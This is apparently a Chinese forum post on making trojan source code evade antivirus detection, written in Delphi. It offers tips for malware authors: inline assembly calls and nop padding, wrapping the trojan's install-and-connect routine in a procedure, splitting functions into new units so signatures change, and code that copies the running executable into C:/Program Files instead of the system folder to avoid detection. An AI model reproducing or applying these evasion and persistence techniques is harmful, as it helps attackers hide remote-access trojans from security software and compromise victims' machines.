木马源代码免杀处理
|
------------------------------------------
有加这样免杀的: ------------------------------------------ begin asm //直接用汇编调用代码进行免杀处理源代码 call test end; Procedure test; asm nop nop nop end; ------------------------------------------ 我喜欢这样: ------------------------------------------ 1,结尾处运行,如 begin ReadSettings; Install; Serv := TServer.Create; While Not (InternetGetConnectedState(NIL, 0)) Do Sleep(5000); Serv.Connect; end. ------------------------------------------ 你可 Procedure Main; ReadSettings; Install; Serv := TServer.Create; While Not (InternetGetConnectedState(NIL, 0)) Do Sleep(5000); Serv.Connect; end; ------------------------------------------ 直接调用相当于od里看到的call begin Main; end. ------------------------------------------ 2、加单元,把一些函数搬到那个单元来,哈哈,结构变了,功能没变,一定免杀 ------------------------------------------ 3、复到系统目录被杀,那就改到复到C:/Program Files function GetWinDir():String; //得到系统目录 var ResultDir:Array[1..64] of char; i:integer; begin for i:=1 to 64 do resultDir:=char($20); GetEnvironmentVariable('windir',@resultDir,64); Result:=resultDir; end; ------------------------------------------ var myn ,myn2:String; myn:=ExtractFilename(ParamStr(0)); myn2:=COPY(trim(GetWindir),1,2)+'/Program Files/'+myn; //复制一份到Program Files if not FileExists(myn2) then begin copyfile(pchar(ParamStr(0)), pchar(myn2), true); end; |